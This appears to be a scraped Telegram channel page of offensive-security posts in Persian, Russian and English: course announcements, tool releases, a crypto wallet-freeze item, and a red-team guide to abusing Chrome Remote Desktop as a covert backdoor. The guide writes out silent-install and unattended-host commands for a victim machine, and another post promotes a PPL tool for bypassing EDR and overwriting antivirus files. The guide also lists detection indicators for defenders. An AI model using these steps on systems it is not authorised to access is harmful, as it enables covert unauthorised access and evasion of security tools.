Source Byte – Telegram
Source Byte
7.73K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Offensive Security & Red Teaming Labs and Projects

Bitnet-labs

Personal Red Team and Offensive Security labs, exercises, and projects.
This repository documents my journey to become an Offensive Security professional and Red Teamer
🤔1
Forwarded from Coinicap
❄️ بلوکه شدن بیش از 28 میلیون دلار دیگر
🔸بنیاد تتر در 26 جولای، بیش از 28 میلیون دلار دارایی تتر را فریز و والت‌های مربوطه را در لیست سیاه خود قرار می داده است.
🔸بررسی ما مشخص کرد که این والت‌ها با احتمال بسیار بالا برای یک سکوی ایرانی بوده اما نمی‌توان با قطعیت گفت کدام سکو و پلتفرم ایرانی این دارایی ها را از دست داده است. حجم واریزی‌ها از صرافی نوبیتکس به این والت‌ها، احتمال اینکه این والت‌ها برای صرافی نوبیتکس باشد را بسیار پایین آورده و تقریبا رد می کند.

🥶 در مجموع بیش ار 50 میلیون دلار دارایی بلوکه شده توسط بنیاد تتر مرتبط با پروژه های ایرانی شناسایی شده است. برخی از این والت‌ها نیز با صرافی‌های متمرکز خارجی مانند بایننس در ارتباط بوده‌اند که احتمالا آنها نیز در صرافی بلوکه و یا در والت‌های ناشناس، فلگ یا فریز شده‌اند.

برخی آدرس والت های فریز شده:

TBJT9BP7cM5yYne9kTdf2HNu9mX1WpRQpt
TGuqbYqJ4m1J8dKWB3NVnsuXtgXCQkgdyf
TTc6TVtmRUpYR9fhZeixsNkJuCMRzFqfcb
👍2🔥2😁1
XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed

Why do these malware samples exhibit such a basic design? 🫥
3😁2
🧪 Abusing Chrome Remote Desktop (CRD) for Covert Access
💻 Red Team tool или вектор для APT?

Chrome Remote Desktop (CRD) — легитимный инструмент от Google, позволяющий управлять системой через веб-интерфейс. Но при грамотной установке и конфигурации он превращается в удобный бекдор: скрытный, устойчивый, шифрованный и легитимный.

⚙️ Этапы эксплуатации (Red Team-практика)

📥 Скачивание инсталлятора
Переход на remotedesktop.google.com → загрузка .msi через Set up via SSH.

📦 Установка на жертве

msiexec /i chromeremotedesktophost.msi /qn


Требуются локальные админ-права.

🌐 Авторизация через Google-аккаунт
В браузере запускается мастер CRD.
После авторизации система выдаёт команду настройки подключения с OAuth-кодом.

🛠️ Обход GUI через undocumented флаг
Чтобы избежать необходимости ручного ввода PIN через GUI:

remoting_start_host.exe --code="TOKEN" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=123456


Ключ --pin= не задокументирован, но работает (≥ 6 цифр).

📡 Подключение

После запуска команды хост появится в веб-интерфейсе CRD.

Подключение через браузер: ввод PIN → полный GUI-доступ.

Импакт
🔹 Устойчивый доступ (если настроен unattended mode)
🔹 Полноценный GUI
🔹 трафик — уходит в Google
🔹 Низкая видимость: всё работает внутри chrome.exe, без .exe из сторонних RAT'ов
🔹 Отсутствие необходимости в порт-форвардинге / firewall-обходе

🛡️ Detection / Hunting
- Установка Chrome Remote Desktop Host:
%ProgramFiles(x86)%\Google\Chrome Remote Desktop\
- Службы: remoting_host.exe
- Планировщик задач: chromeremotedesktophost
- Нетипичный трафик к:
remotedesktop-pa.googleapis.com
relay.mtls.sandbox.googleapis.com
- Поведенческий анализ chrome.exe с GUI-доступом в off-hours

📍Вывод: техника идеально вписывается в APT / Red Team TTPs. CRD — малозаметный способ удалённого управления, особенно актуален при наличии EDR, блокирующего кастомный RAT. Рекомендуется whitelist-контроль (AppLocker, WDAC) и мониторинг установки CRD в инфраструктуре.

🔗https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍1😁1
Forwarded from Sec Note
Vx-Drivers 🕳️

[ Tweet ]
8
Forwarded from OS Internals (Abolfazl Kazemi)
Media is too big
VIEW IN TELEGRAM
🎥 ویدئوی معرفی دوره Exploit Development در لینوکس

📚 توی این دوره قراره یاد بگیریم آسیب‌پذیری‌ها در لینوکس چطور به وجود میان، چطور شناسایی می‌شن و چطور می‌شه ازشون استفاده کرد. قدم‌به‌قدم جلو میریم: از آشنایی با ساختار و امنیت لینوکس، تا پیدا کردن باگ‌ها و نوشتن اکسپلویت برای اون‌ها.

🧨 بخش مهم دوره، مهندسی معکوس برنامه‌های لینوکسیه؛ یعنی یاد می‌گیریم چطور یک فایل اجرایی رو باز کنیم، کدهاشو بخونیم و ضعف‌هاشو پیدا کنیم. با ابزارهایی مثل GDB، pwndbg، Ghidra، Radare2، PwnTools و چند تا ابزار دیگه کار می‌کنیم و در عمل می‌بینیم چطور می‌شه مکانیزم‌های امنیتی مثل ASLR، Stack Canaries، NX رو دور زد.

💣 در طول دوره با انواع آسیب‌پذیری‌ها مثل Buffer Overflow، Integer Overflow، Format String و چیزهای دیگه آشنا می‌شیم، روش‌های بهره‌برداری رو یاد می‌گیریم و روی چالش‌های CTF تمرین می‌کنیم.

💡در پایان هم یک پروژه عملی داریم: تحلیل یک CVE واقعی و نوشتن اکسپلویت برای اون.

هر پنج‌شنبه منتظر یک فصل از دوره باشید. شروع از ۵شنبه ۳۰ مرداد.

https://news.1rj.ru/str/OxAA55/140
5👎1
Forwarded from Sina
HyperDbg نسخه ۰.۱۵ منتشر شد! 🎈

این نسخه با یک دستور جدید وقفه SMM (SMI) ارائه می‌شود و مشکلات شبیه‌سازی Intel CET برای SYSCALL/SYSRET در پردازنده‌های نسل یازدهم (Tiger/Rocket Lake) را برطرف می‌کند، همچنین رجیسترهای XMM را در VM-exits/entries ذخیره/بازیابی می‌کند.

آن را بررسی کنید:
https://github.com/HyperDbg/HyperDbg/releases/tag/v0.15

اطلاعات بیشتر:
https://docs.hyperdbg.org/commands/extension-commands/smi

بهبود دستور '.pe':
https://docs.hyperdbg.org/commands/meta-commands/.pe
17
Source Byte
RTTI Internals in MSVC https://www.lukaszlipski.dev/post/rtti-msvc/ #RTTI
Breaking modern software protectors through exploitation

Reverse engineer VMProtect's obfuscator by using its embedded Lua noscripting engine. They recover the original #RTTI information from the obfuscator and get a better understanding of its inner workings.

https://www.youtube.com/live/PAG3M7mWT2c?si=Okhlj2PjXqfue5NU

#vmprotect

source
5
Forwarded from Sec Note
Friday, Aug 22 • 10:00 AM – 12:00 PM
Google Meet joining info
Video call link: https://meet.google.com/ubg-uwrt-mhg
👾19🔥164👎2
manual.pdf
1.6 MB
64-bit Intel Assembly Language Programming for Hackers
Lecture Notes for the DEF CON 33 Workshop


LINK
Forwarded from Caster
Релиз моей статьи об атаках на IPv6

Caster - Legless (БезногNM)

Genre: Offensive
Label: exploit.org
Release Date: 20 July 2025
Language: English

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Edit: Magama Bazarov

https://blog.exploit.org/caster-legless
3
Forwarded from APT
🛡CreateProcessAsPPL

This is a utility for running processes with Protected Process Light (PPL) protection, enabling bypass of EDR/AV solution defensive mechanisms. It leverages legitimate Windows clipup.exe functionality from System32 to create protected processes that can overwrite antivirus service executable files.

🔗 Source:
https://github.com/2x7EQ13/CreateProcessAsPPL

#av #edr #bypass #ppl
4